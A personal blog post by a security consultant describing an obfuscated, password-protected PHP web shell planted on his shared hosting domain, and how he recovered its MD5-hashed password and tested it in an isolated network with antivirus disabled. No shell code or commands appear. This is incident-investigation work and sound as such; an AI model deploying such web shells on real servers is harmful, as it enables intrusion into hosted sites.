PHP Infected

At a certain point as a Security Consultant / Ethical Hacker you may find that some other hackers are aiming at you and you domain.

Well it happend. They where able to place some files on the shared hosting environment of my Internet Site Hoster. I found out that files where placed as I recieved mails from SIDN that thier “Netcraft Takedown Service” had found infected files inside my .zefat.nl domain.
(my www.zefat.nl domain is located on other servers.)

OK… Domain down.. Darn..
Looking at the folder at my hosted site I see the files and copy the content to my system for future investigation.

Lets put the script to the test:

Password protected Encrypted File Password request

OK. Password. Lets try to decrypt the file.

The site: https://www.unphp.net/ did a neat job, but was unable to decrypt the file correctly. As the decrypted file gave me a error 500 message.
(I’ll investigate that later)

BUT… the file starts somewhere with a “$auth_pass=” string. That looked like an MD5 encoding. So trying to decode this I came across the password.


Password protected Encrypted File GUI

Working!!

As a trained eye can see, you can do a lot with this file.

Testing this at home got me puzzled a moment, as nothting was fully working, what looks odd as they put a lot of effort in the script.
But the reason for that was that I have a firewall segmenting all my networks. The server running this file was in a /29 virus network, with no options to go outside and my system was protected with AV profiles.

Disabling AV on my policy made the script work.

So I may conclude my hosting provider is Not or Nearly No security / Fire walling between its servers and the Internet.

To be continued…